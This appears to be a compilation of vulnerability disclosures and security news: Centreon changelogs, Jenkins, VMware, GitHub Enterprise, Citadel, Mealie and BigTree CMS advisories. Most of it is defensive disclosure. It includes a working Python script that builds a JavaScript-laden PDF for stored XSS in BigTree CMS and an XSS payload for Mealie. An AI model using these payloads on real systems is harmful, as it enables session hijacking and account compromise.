This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability. The specific flaw exists within the configuration of poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator. Was ZDI-CAN-16335.

**Introduction​**

You can find in this chapter all changelogs concerning **Centreon Core**.

> It is very important when you update your system to refer to this section in order to learn about behavior changes or major changes that have been made on this version. This will let you know the impact of the installation of these versions on the features you use or the specific developments that you have built on your platform (modules, widgets, plugins).

If you have feature requests or want to report a bug, please go to our Github

**Centreon Web​****21.10.8​**

Release date: August 3, 2022

**Security​**

*   \[Configuration\] Fixed SQLi vulnerability in escalations configuration
*   \[Configuration\] Fixed XSS vulnerability in escalations configuration

**21.10.7​**

Release date: June 10, 2022

**Bug Fixes​**

*   \[API\] Fixed /monitoring/host endpoint to return service state
*   \[API\] Fixed SQL syntax when retrieving service\_id field
*   \[Business Activity\] Fixed synchronization of configuration with Remote Server
*   \[Configuration\] Fixed export when host group is disabled
*   \[Configuration\] Fixed export when service group is disabled
*   \[Configuration\] Fixed export when service template is disabled
*   \[Core\] Fixed database partitioning issue with MySQL 8
*   \[Dashboard\] Fixed displaying of first service in host reporting dashboard
*   \[Discovery\] Fixed critical error when searching host templates with notification option in mappers configuration
*   \[Install\] Fixed error when installing Centreon with remote DBMS
*   \[Monitoring\] Fixed notification number in legacy pages
*   \[Remote Server\] Fixed synchronization of configuration
*   \[Resource Status\] Fixed color when resources are selected in downtime or acknowledged
*   \[UX\] Fixed timezone when adding a downtime or an acknowledgement
*   \[UX\] Follow user configuration for Date/Time display
*   \[Widget\] The list of pollers is now filtered according to the user's ACLs

**Security​**

*   \[Security\] Fixed RCE in command
*   \[Security\] Fixed SQLi in virtual metrics
*   \[Security\] Sanitize and bind "hostgroups" queries
*   \[Security\] Sanitize and bind "meta\_service" related queries
*   \[Security\] Sanitize and bind "poller" queries
*   \[Security\] Sanitize and bind ACL resources queries

**21.10.6​**

Release date: May 2, 2022

**Bug Fixes​**

*   \[API\] Fixed an issue in the icons API endpoint that always returned 0 for total number of results
*   \[Banner\] Fixed display of empty skeleton
*   \[Charts\] Fixed slowdown in graphics display
*   \[Configuration\] Fixed an issue that caused the export of the poller configuration files to fail when a disabled host template was used
*   \[Configuration\] Fixed checkbox selection after enabling/disabling a contact via icons
*   \[Core\] Fixed an issue where proxy settings were saved with empty parameters
*   \[Install\] Fixed an issue in database user creation with remote DBMS
*   \[Monitoring\] Fixed display of acknowledgement information in legacy Resources Status pages
*   \[Monitoring\] Fixed relation issue for recurrent downtimes
*   \[Reporting\] Fixed an issue where MBI graphs reports were not using graph templates
*   \[Resources Status\] Fixed default settings for acknowledgments and downtimes
*   \[Resources Status\] Fixed display of acknowledgements comments
*   \[Resources Status\] Fixed Hard/Soft translation
*   \[Resources Status\] Fixed monitoring command that was not displayed in Resources Status Details panel
*   \[UX\] Fixed display of date with UTC timezone in datepickers
*   \[UX\] Improved interface response time if CEIP is enabled but the browser does not have internet access

**Security Fixes​**

*   \[Apache\] Fixed cookies with missing or contradictory properties
*   \[Apache\] HTTPS Apache configuration now includes HSTS
*   \[Configuration\] Fixed an SQL injection issue in Configuration > Poller > Resources
*   \[Core\] Passwords are now obfuscated in the page's HTML source
*   \[Core\] Replace Math.random by Crypto JS API
*   \[PHP\] Disabled allow\_url\_fopen in PHP

**21.10.5​**

Release date: March 21, 2022

**Security Fixes​**

*   \[Administration\] SQL Injections on ACL group listing
*   \[Administration\] SQL Injection on Knowledge Base configuration form
*   \[Administration\] SQL Injections on LDAP listing
*   \[Configuration\] Command path traversal resulting in RCE on command edition form
*   \[Configuration\] SQL Injection on export configuration
*   \[Configuration\] SQL Injections on SNMP traps edition form
*   \[Core\] RCE in legacy PHP's class autoload
*   \[Monitoring\] SQL Injection on performance curve edition form

**21.10.4​**

Release date: March 3, 2022

**Enhancements​**

*   \[Authentication\] Autologin Validation reinforcement
*   \[Install\] Set broker retry interval to 15s instead of 60s
*   \[Performance\] Improve SQL queries to use index
*   \[Reporting\] Add select2 to hostgroup and servicegroup reporting dashboards
*   \[Resource Status\] Added custom variables definition in URL/Action URL
*   \[Resource Status\] Create new filter on type of status (Hard or Soft)
*   \[Stats\] Manage exception for statistics
*   \[UX\] Add TheWatch url to Centreon footer

**Bug Fixes​**

*   \[APIv2\] Fixed criticality null return for monitoring endpoint
*   \[Apache\] Fixed SNMP MIB import mib with new mod\_security rule definition
*   \[Authentication\] Improve LDAP authentication and authorization
*   \[Authentication\] Remove deadlocks on token deletion
*   \[Configuration\] A regression in the host/host template configuration form caused the inherited macros to be saved as owned by the host/host template instead of being inherited. This can be seen as the loss of orange coloration. To undo this unwanted change, remove the macros from the list and they will be inherited again.
*   \[Configuration\] Contact template properties not exported with the contact
*   \[Configuration\] Fixed an infinite loop in export of configuration
*   \[Configuration\] Fixed an issue in the contact form. When a non-admin user modified another non-admin user, only access groups that were common to both users were kept, other access groups were lost for the second user.
*   \[Configuration\] Fixed an issue in the contact form: when a non-admin user modified a duplicated contact, it resulted in a blank screen
*   \[Configuration\] Wizard doesn't insert anymore old logger configuration
*   \[Monitoring\] Fixed deletion of comments
*   \[Reporting\] Fixed timeperiod selection in dashboards when changing resource
*   \[Resources Status\] Change "resource" by "type" in Resource status filter menu
*   \[Resources Status\] Contents cropped in many tiles in French
*   \[Resources Status\] Fixed display of old downtimes
*   \[Resources Status\] Removed the tooltips on hover for urls
*   \[Resources Status\] Rework Detail panel chip: hostgroup/servicegroup

**Security Fixes​**

*   XSS reflected from plugin's metric output
*   XSS in reporting dashboard

**21.10.3​**

Release date: January 26, 2022

**Bug Fixes​**

*   \[Graph\] Fixed display of additional graph if it came from Resources Status
*   \[Install\] Fixed SQL request syntax error for cron with MySQL 8
*   \[Resources Status\] Fixed display of meta-services
*   \[Resources Status\] Fixed graph unit displayed twice
*   \[Resources Status\] Fixed saving a filter on an existing name
*   \[Resources Status\] Take the default downtime options to set downtime
*   \[UX\] Fixed random disconnection since update to Centreon 21.10

**21.10.2​**

Release note: December 24, 2021

**Enhancements​**

*   \[Administration\] Display the name of the object that has been modified in the detail form of logs
*   \[Authentication\] Removed token display in login debug file
*   \[UI\] The top-counter menu for pollers is now refreshed immediately after enabling the "Export button" in the user's profile

**Bug Fixes​**

*   \[API\] Fixed the access to API is account doesn't have access to GUI
*   \[Authentication\] Fixed LDAP OU quote connection breaking
*   \[CLAPI\] Fixed an issue preventing ACLs from applying on services created with CLAPI
*   \[CLAPI\] Fixed error with LDAP configuration ID
*   \[Configuration\] Fixed SNMP Trap matching with service linked to multiple hosts
*   \[Configuration\] Fixed an issue that caused the Anomaly Detection services to lose their graphs when they were renamed
*   \[Configuration\] Fixed an issue that caused the loss of broker output configuration
*   \[Configuration\] Fixed an issue that prevented from removing the SNMP community (and other fields) from the host form
*   \[Configuration\] Fixed the wizard for adding a new server that did not add it
*   \[Configuration\] Fixed unwanted writes into unexisting file when exporting Traps config at the same time as a trap arrives. Based on PR #9973. Fixes issue #4236.
*   \[MBI\] Fixed CBIS process trying to get contact\_js\_effects column that no longer exists
*   \[Resource Status\] Fixed graph tooltip

**21.10.1​**

Release date: November 29, 2021

**Bug Fixes​**

*   \[Authentication\] Fixed PHP error when debug is enabled with OIDC authentication
*   \[Configuration\] Fixed the list of host template that was not available if the database name was different from the default
*   \[UX\] Non admin user do not have the same submenu subsections
*   \[UX\] Remove "Animation effects" option

**21.10.0​****Enhancements​**

*   \[Authentication\] Improve OIDC support (OpenId Connect)
    *   Add Okta support
    *   Add MS Azure AD / ADFS
    *   Add possibility to define which claim is used for Centreon login
    *   Add possibility to define complete URL for endpoints
    *   Add possibility to use client\_secret\_basic as authentication. Based on PR #9878
    *   Allow to define no redirect URL. Based on PR #9877
    *   Add errors log in /var/log/centreon/login.log
    *   Add possibility to display debug log in /var/log/centreon/login.log
    *   Use proxy if defined
*   \[API\] API versioning is now consistent with Centreon's major release number
*   \[CEIP\] Product Adoption component integration
*   \[Configuration\] The poller management actions are now only available via buttons:
    *   "Add" now leads to the wizard.
    *   "Add (advanced)" leads to the former "Add" action (for experts only).
    *   "Delete" and "Duplicate" are converted into buttons.
    *   "Delete" should normally not be confused with another action.
*   \[Configuration\] The deprecated "Logger" tab of the "Broker configuration" menu has been removed
*   \[Resources Status\] Revamp Search experience
*   \[Resources Status\] Revamp Timeline
*   \[Resources Status\] Add Sticky and Persistent options to ACK in Resource Status
*   \[Resources Status\] Allow detail tiles to be re-ordered for each user
*   \[Resources Status\] Add multi-select to Resources Status listing
*   \[Resources Status\] Add "Last OK" tile within Details panel
*   \[Resources Status\] Persist user selected number of rows displayed
*   \[Resources Status\] Make "duration" as the default second sorting criteria
*   \[Resources Status\] Add link to performance page in detail panel. Based on PR #9822
*   \[Resources Status\] Add Graphs panel for Hosts
*   \[Resources Status\] Add tooltip to explain grayed options
*   \[Resources Status\] Improve Custom Columns Name Display
*   \[Resources Status\] Move Shortcuts from dedicated panel to option within Header
*   \[Resources Status\] Make configure resource icon always visible
*   \[Resources Status\] Improve readability of command line displayed
*   \[UX\] Add Feature Flipping for Resources Status vs Legacy Pages
*   \[UX\] Downtimes can now be scheduled until 2100
*   \[UX\] The poller management action buttons are now hidden on Remote Servers

**Beta enhancements​**

*   \[Configuration\] Administrators can toggle a new button in the Pollers top-counter menu that allows them to export and reload the configuration of all pollers from any page

**Breaking changes​**

> Access to API v2 has been changed. All of the beta endpoints have been migrated to version 21.10. This must be modified by "latest" or by the version of your Centreon platform (v21.10 for example).

For example replace:

    {protocol}://{server}:{port}/centreon/api/beta/login

By:

    {protocol}://{server}:{port}/centreon/api/latest/login

or: By:

    {protocol}://{server}:{port}/centreon/api/v21.10/login

**Performances​**

*   Move to PHP 8.0
*   Preparing Debian 11 support

**Centreon Collect​****21.10.2​**

Release date: June 15, 2022

**Centreon Broker​****Improvements​**

*   Improved the way TCP connections are stored by keeping them in an ordered structure. This should avoid rare connection issues experienced by some users

**Bug fixes​**

*   Fixed an issue that caused broker to crash when a BAM output was configured and the BAM tables did not exist
*   Added a bbdo_version function to the LUA libraries for Stream Connectors developers
*   Scheduled downtimes used to be inserted one at a time, which caused performance issues on platforms with a lot of recurrent scheduled downtimes. They are now injected in bulk inserts to reduce demands on the database and avoid performance issues.
*   Broker crashed when a logger was disabled/off
*   Fixed an issue that could prevent broker from connecting again after the database was stopped to make a LVM snapshot
*   Broker crashed when its configuration included a filter that referred to a module that wasn't loaded

**Centreon Engine​****Improvements​**

*   Removed unnecessary informational log messages regarding Anomaly Detection in the Poller configuration export page

**Bug fixes​**

*   Fixed an issue that caused centengine to send duplicate service status messages to broker. This change will reduce network bandwidth consumption, database activity and disk I/O.
*   Fixed an issue with the way escaped special characters were managed (eg. \\n)
*   Fixed an issue that caused loss of recovery notifications when a downtime end notification was sent before recovery
*   Reviewed the way time period exceptions are handled to fix some issues with the way notifications are managed

**Centreon Perl & SSH Connectors​****Bug fixes​**

*   Fixed an issue that could cause the SSH connector to crash
*   Fixed a memory leak issue in the Perl connector

> As of version 21.10.0, the components of Centreon Collect (Centreon Broker, Centreon Clib, Centreon Engine and Centreon Connectors) are released simultaneously. They are now grouped under this section.

**21.10.1​**

Release date: February 23, 2022

**Centreon Broker​****Improvements​**

*   Improved the multiplexing of events, which was a performance bottleneck. The processing speed of queued events should be significantly increased.
*   Some TLS trace logs were logged as errors, flooding the log file.
*   The SQL connections stats have been added to the broker stats available via gRPC.
*   Added the SQL Manager statistics in gRPC and stabilized the stats provider.
*   Added to LUA Stream Connectors' perfdata label parser the compatibility with centreon-plugins new metrics naming convention.

**Bug fixes​**

*   Fixed a regression due to the central broker's cache generation optimization, which was too thorough and prevented BAM from computing KPIs based on boolean rules
*   The central broker's cache generation loaded too much data and took too much time when BAM was activated.
*   Fixed an issue that could cause segmentation faults in centreon-engine when scheduling external commands
*   Fixed a design issue to avoid trying to access variables of broker's new logger when the logger was stopped. This issue could cause segmentation faults.
*   When a single metric is deleted, the corresponding RRD file is now actually removed.
*   If the SQL stream took too long to initialize its connection, then the Perfdata stream timed out and the whole connection failed. To fix this, the timeout has been increased.
*   In some circumstances, the mysql_ping function, which is used to test if the session is still active, could freeze. To fix this, the calls to mysql_ping have been spaced out, a timeout has been added, and the commit management has been consolidated.
*   Fixed an issue causing BAM Business Activities (best status) to remain in an OK state when the OK KPIs were removed
*   Refactored the BAM Business activities downtimes inheritance mechanism so that they are properly inherited and not duplicated anymore.

> After having updated centreon-broker to this version, you may still have unwanted remaining downtimes on your Business Activities. It can happen if a downtime that was inherited from a KPI has been duplicated and if the original downtime ended before the bugfix was installed. In that case, you will have to apply the following procedure.

    systemctl stop centenginesed -i -zE 's/(servicecomment|servicedowntime) \{\nhost_name=_Module_BAM_1\n[^}]*\}\n//g' /var/log/centreon-engine/retention.datsystemctl start centengine

All the downtimes applied on Business Activities have now been removed.

You must then restart the centengine service on all the other pollers to restore the legitimate inherited downtimes.

**21.10.0​****Centreon Engine​**

*   Flapping now starts only on non-OK states. Based on PR #523
*   Flapping now starts only for services of UP hosts or for hosts with UP parent. Based on PR #524. Fixes Issue #192
*   Provide feedback on gRPC client execution success/failure

**Centreon Broker​**

*   Queues (in memory and retention files) are now cleared for reversed broker flows without peer retention when the connection is reset. This is a change of behavior back to what it should have always been. It will prevent endless retention files for Centreon-Studio (Centreon-Map).
*   \[BETA\] Centreon-broker is now able to use OpenSSL instead of GNUTLS and allows forcing TLS/SSL version and cipher suite
*   Broker now only loads the modules that are necessary for its inputs and outputs
*   Old broker log format has been removed

**Centreon Gorgone​****21.10.2​**

Release date: February 17, 2022

**Enhancements​**

*   Added an "audit" module to Gorgone to provide an overview of the system status, package versions, + some Centreon metrics.
*   Added a new "httpserverng" module to allow asynchronous API calls.

**Bugfixes​**

*   Fixed an issue that caused Service Discovery scans to fail because the wrong message was caught.
*   Fixed an issue that could make Gorgone crash in pull mode.
*   Fixed uninitialized values in Gorgone that could cause error log messages.
*   Fixed an issue that prevented Gorgone from handling advanced Service Discovery features correctly.
*   Fixed an issue in the module management that could cause crashes.

**21.10.1​**

Release date: December 14, 2021

**Bugfixes​**

*   Make Gorgone’s private key readable by centreon-gorgone only
*   Gorgone was too long to restart, which could cause the service to reach the systemctl timeout. The time to stop has been thoroughly decreased.

**21.10.0​**

*   Add IPv6 support

CVE-2022-34871: Centreon Core | Centreon Documentation

‘We believe that announcing vulnerabilities without a fix is the best solution for a difficult problem’

‘We believe that announcing vulnerabilities without a fix is the best solution for a difficult problem’

Open source DevOps platform Jenkins is warning users of unpatched security vulnerabilities impacting more than a dozen plugins.

A leading open source automation server, Jenkins provides thousands of plugins to support building, deploying, and automating projects.

The organization’s latest security advisory lists a total of 27 plugin vulnerabilities, five of which were deemed to be ‘high’ impact and the majority of which remain unpatched.

**High five**

First on the list of high impact bugs – all of which were unfixed at the time of writing – is a cross-site request forgery (CSRF) vulnerability in the Coverity plugin (CVE-2022-36920).

It was found that the plugin fails to perform a permission check in an HTTP endpoint. In addition, this HTTP endpoint does not require POST requests, opening the door to CSRF attacks.

**YOU MIGHT ALSO LIKE** CompleteFTP path traversal flaw allowed attackers to delete server files

Meanwhile, an arbitrary file write vulnerability in the CLIF Performance Testing Plugin (CVE-2022-36894) allows attackers with ‘Overall/Read’ permission to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content.

Stored cross-site scripting (XSS) flaws were also discovered in the Dynamic Extended Choice Parameter plugin (CVE-2022-36902) and Maven Metadata plugin (CVE-2022-36905), along with a reflected XSS vulnerability in the Lucene-Search plugin (CVE-2022-36922).

**Getting the word out**

Of the 27 plugin vulnerabilities listed in the latest Jenkins security advisory, 18 remained unpatched and are effectively zero-days.

Discussing the team’s decision to disclose these issues to the community in lieu of any fixes, Jenkins security officer Wadeck Follonier told _The Daily Swig_: “The main objective of the Jenkins security team is to ensure the Jenkins plugin ecosystem is as secure as possible.

“With a plugin ecosystem as big as ours, it isn’t a surprise that not every plugin is maintained all the time, and maintainers sometimes cannot be contacted, do not respond, or tell us they’re no longer able to maintain the plugin.

“In those cases, we analyze the vulnerability in depth, write up a detailed description, and announce it in a security advisory with other, fixed vulnerabilities.”

Read more about the latest security vulnerabilities

Follonier added: “We believe that announcing vulnerabilities without a fix is the best solution for a difficult problem, as it allows administrators to carefully consider their continued use of the affected plugin.

“Besides the Jenkins Advisories mailing list and our social channels, we inform administrators about vulnerabilities affecting their Jenkins instance directly on the UI immediately after publishing an advisory, so every Jenkins administrator gets informed about this.

“Our recommendation to Jenkins administrators is to read our security advisories to understand whether they’re impacted,” Follonier said. “A lot of vulnerabilities are irrelevant to instances with only a single administrator user that are inaccessible to others, for example.

“Of course, if they are unsure whether they are affected, the safest thing to do is to uninstall the plugin.”

**RECOMMENDED** Trio of XSS bugs in open source web apps could lead to complete system compromise

Jenkins security: Unpatched XSS, CSRF bugs included in latest plugin advisory

Virtualization services provider VMware on Tuesday shipped updates to address 10 security flaws affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.
The issues tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8) affect the VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager

Virtualization services provider VMware on Tuesday shipped updates to address 10 security flaws affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.

The issues tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8) affect the VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.

The most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative access.

Also resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.

Elsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.

Rounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to "root," a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).

While successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.

VMware said it's not aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to apply the patches immediately to mitigate potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

VMware Releases Patches for Several New Flaws Affecting Multiple Products

BigTree CMS 4.4.16 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted PDF file.

A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

1.  Login as admin and access the files upload page:  
    
2.  Use the following PoC to generate malicious files:

import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray

def make\_js\_action(js):
    action \= PdfDict()
    action.S \= PdfName.JavaScript
    action.JS \= js
    return action

def make\_field(name, x, y, width, height, r, g, b, value\=""):
    annot \= PdfDict()
    annot.Type \= PdfName.Annot
    annot.Subtype \= PdfName.Widget
    annot.FT \= PdfName.Tx
    annot.Ff \= 2
    annot.Rect \= PdfArray(\[x, y, x + width, y + height\])
    annot.MaxLen \= 160
    annot.T \= PdfString.encode(name)
    annot.V \= PdfString.encode(value)

    \# Default appearance stream: can be arbitrary PDF XObject or
    \# something. Very general.
    annot.AP \= PdfDict()

    ap \= annot.AP.N \= PdfDict()
    ap.Type \= PdfName.XObject
    ap.Subtype \= PdfName.Form
    ap.FormType \= 1
    ap.BBox \= PdfArray(\[0, 0, width, height\])
    ap.Matrix \= PdfArray(\[1.0, 0.0, 0.0, 1.0, 0.0, 0.0\])
    ap.stream \= """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)

    \# It took me a while to figure this out. See PDF spec:
    \# https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf\_reference\_1-7.pdf#page=641

    \# Basically, the appearance stream we just specified doesn't
    \# follow the field rect if it gets changed in JS (at least not in
    \# Chrome).

    \# But this simple MK field here, with border/color
    \# characteristics, \_does\_ follow those movements and resizes, so
    \# we can get moving colored rectangles this way.
    annot.MK \= PdfDict()
    annot.MK.BG \= PdfArray(\[r, g, b\])

    return annot

def make\_page(fields, script):
    page \= PdfDict()
    page.Type \= PdfName.Page

    page.Resources \= PdfDict()
    page.Resources.Font \= PdfDict()
    page.Resources.Font.F1 \= PdfDict()
    page.Resources.Font.F1.Type \= PdfName.Font
    page.Resources.Font.F1.Subtype \= PdfName.Type1
    page.Resources.Font.F1.BaseFont \= PdfName.Helvetica

    page.MediaBox \= PdfArray(\[0, 0, 612, 792\])

    page.Contents \= PdfDict()
    page.Contents.stream \= """
BT
/F1 24 Tf
ET
    """

    annots \= fields

    page.AA \= PdfDict()
    \# You probably should just wrap each JS action with a try/catch,
    \# because Chrome does no error reporting or even logging otherwise;
    \# you just get a silent failure.
    page.AA.O \= make\_js\_action("""
try {
  %s
} catch (e) {
  app.alert(e.message);
}
    """ % (script))

    page.Annots \= PdfArray(annots)
    return page

if len(sys.argv) \> 1:
    js\_file \= open(sys.argv\[1\], 'r')

    fields \= \[\]
    for line in js\_file:
        if not line.startswith('/// '): break
        pieces \= line.split()
        params \= \[pieces\[1\]\] + \[float(token) for token in pieces\[2:\]\]
        fields.append(make\_field(\*params))

    js\_file.seek(0)

    out \= PdfWriter()
    out.addpage(make\_page(fields, js\_file.read()))
    out.write('result.pdf')

3.  Back to Files then we can see result.pdf have been upload:  
    
4.  When the administrator click the result.pdf it will trigger a XSS attack. In addition, after switching to a normal user, the normal user still have permission to access/site/index.php/admin/files/result.pdf and trigger a XSS attack.

CVE-2022-36197: A stored cross-site scripting (XSS) vulnerability exists in BigTree CMS 4.4.16 · Issue #392 · bigtreecms/BigTree-CMS

Mealie1.0.0beta3 was discovered to contain a Server-Side Template Injection vulnerability, which allows attackers to execute arbitrary code via a crafted Jinja2 template.

CVE-2022-34625: CWE-94: Improper Control of Generation of Code ('Code Injection') (4.8)

A stored XSS vulnerability was identified in GitHub Enterprise Server that allowed the injection of arbitrary attributes. This injection was blocked by Github's Content Security Policy (CSP). This vulnerability affected all versions of GitHub Enterprise Server prior to 3.6 and was fixed in versions 3.3.11, 3.4.6 and 3.5.3. This vulnerability was reported via the GitHub Bug Bounty program.

CVE-2022-23733

The embedded neutralization of Script-Related HTML Tag, was by-passed in the case of some extra conditions.

French President uses Cryptosmart **to secure his devices and mobile communications** Learn more

*   Group
*   solutions
    
      
    
    **Messaging, voice and videoconferencing Citadel Team**
    
    The trusted alternative to mass market instant messaging solutions
    
    See more >
    
    **Collaboration is a matter of trust**
    
    Boost communication by inviting thousands of members in dedicated chat rooms!
    
    See more >
    
    **Presentation**
    
    Cryptobox provides businesses and organizations with a sharing and collaboration solution to secure internal and external exchanges, using end-to-end encryption.
    
    See more >
    
    **Presentation**
    
    Cryptobox is the first secure sharing and collaboration solution to provide end-to-end data encryption, whether your device is a smartphone or a computer.
    
    See more >
    
    **Presentation**
    
    The digital transformation affects all businesses and organizations, from the smallest to the largest. This transformation brought about by technological developments offers many benefits:
    
    See more >
    
    **Presentation**
    
    To meet the new challenges of mobility and remote work, Ercom has developed Cryptosmart PC, a sovereign VPN solution to secure the connections of your remote Windows computers.
    
    See more >
    
    **Presentation**
    
    Cryptosmart is the only “Restricted” French & NATO certified solution, jointly developed with Samsung, to secure end-to-end mobile communications on consumer devices.
    
    See more >
    
*   Talents
*   Newsroom
    
*   Ressources
    
*   Contact-Us

*   Home
*   Security Updates

**CVE-2022-1293 | XSS vulnerability in Citadel**

*   **Publication date**: 2022-04-13T09:42:00.000Z
*   **State**: public
*   **Description**: We have discovered a vulnerability that can affect the Citadel client. The embedded neutralization of Script-Related HTML Tag, was by-passed in the case of some extra conditions.
*   **Affected versions**: 7.1.1 and lower
*   **Remediation**: update to version 7.1.2 or higher
    *   web client: just reload the page
    *   desktop client: launch update from the menu

CVE-2022-1293: Security Updates | Ercom

Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Researchers have released details on a trio of cross-site scripting (XSS) vulnerabilities in popular open source apps that could lead to remote code execution (RCE).

The security bugs, found by a research team from PT Swarm, were discovered in web development applications Evolution CMS, FUDForum, and GitBucket.

A traditional XSS attack allows the attacker’s JavaScript code to be executed in the victim user’s browser, opening the door to cookie theft, redirection to a phishing site, and much more.

Web security researcher Aleksey Solovev told The Daily Swig that this research, detailed in PT Swarm’s blog, relates to how “the combination of the discovered possibility of conducting an XSS attack and the built-in file manager (or executing a SQL query) in the administrator panel can lead to a complete compromise of the system”.

**Triple threat**

The first vulnerability, in Evolution CMS v3.1.8, could allow an attacker to carry out a reflected XSS attack in several places in the admin panel.

“An attacker could try to force a system administrator to follow a malicious link through social engineering, which would lead to the execution of malicious JavaScript code in the browser of the attacked,” Solovev told The Daily Swig.

“The consequence would be a complete compromise of the system by overwriting the executable file using the built-in file manager.”

Read more of the latest web security research here

A second flaw, found in FUDforum v3.1.1, could potentially allow a malicious actor to carry out a stored XSS attack in the name of the attached file in private messages.

“An attacker could send a private message to an administrator with a malicious payload in the name of the attached file,” said Solovev.

“When this message is read by the administrator, his browser would execute the JavaScript code and, using the built-in file manager, an executable file would be created that would allow the attacker to execute commands on the server.”

Finally, in GitBucket v4.37.1, a security bug was discovered that could enable an attacker to carry out a stored XSS attack in “several places”, according to Solovev.

An attacker had to create an issue in a public repository and inject a JavaScript code into the name of the assignment.

This event would be displayed in the general feed and the attacker’s profile. It was in these places that the insecure display of the task name with a malicious load was present, which led to the execution of JavaScript code in the browser of everyone who viewed these pages.

“In the admin panel, it was possible to execute SQL code based on the H2 Database Engine, for which there is already an exploit that allows you to execute a command on the server,” Solovev explained.

“Putting everything together, an attacker could attack the administrator and gain the ability to execute commands on the server.”

**Patches released**

All three vulnerabilities are pending a CVE but have been patched by the maintainers of the projects, Solovev told The Daily Swig.

The researcher added that the main difficulty in discovering these flaws was to find the possibility of conducting an XSS attack.

“The rest of the steps were easier because they had public exploits for legitimate functionality in the form of a file manager in the admin panel,” he explained.

More information about the vulnerabilities and technical detail on the exploit can be found in PT Swarm’s blog.

YOU MAY ALSO LIKE GitHub Actions workflow flaws provided write access to projects including Logstash

Trio of XSS bugs in open source web apps could lead to complete system compromise

Mealie 1.0.0beta3 contains an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file.

CVE-2022-34613: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.8)

A stored cross-site scripting (XSS) vulnerability in Mealie 1.0.0beta3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the recipe description text field.

**Description**

A low privilege user can insert malicious JavaScript code into the Recipe Instructions which will execute in another person's browser that visits the recipe.

**Proof of Concept**

    <img src=x onerror=alert(document.domain)> 
    

**Reproduction Steps:**

1.  As a lower privileged user login to the Mealie web application.
2.  Create a recipe and using the inline markdown editor add the Proof of Concept code to the Instructions.
3.  An alert box will appear indicating the presence of XSS.

**Impact**

A lower privilege user can submit malicious JavaScript into the Recipe Instructions which will execute in the context of another person's browser when they navigate to the vulnerable page. Since this is a Stored XSS vulnerability, no user interaction is required besides browsing to the vulnerable page. An attacker can use this XSS vulnerability to do anything that JavaScript can do, including but not limited to, making arbitrary HTTP requests in the victim's browser, hook a victim's browser, and hijack an admin session.

Tag

#xss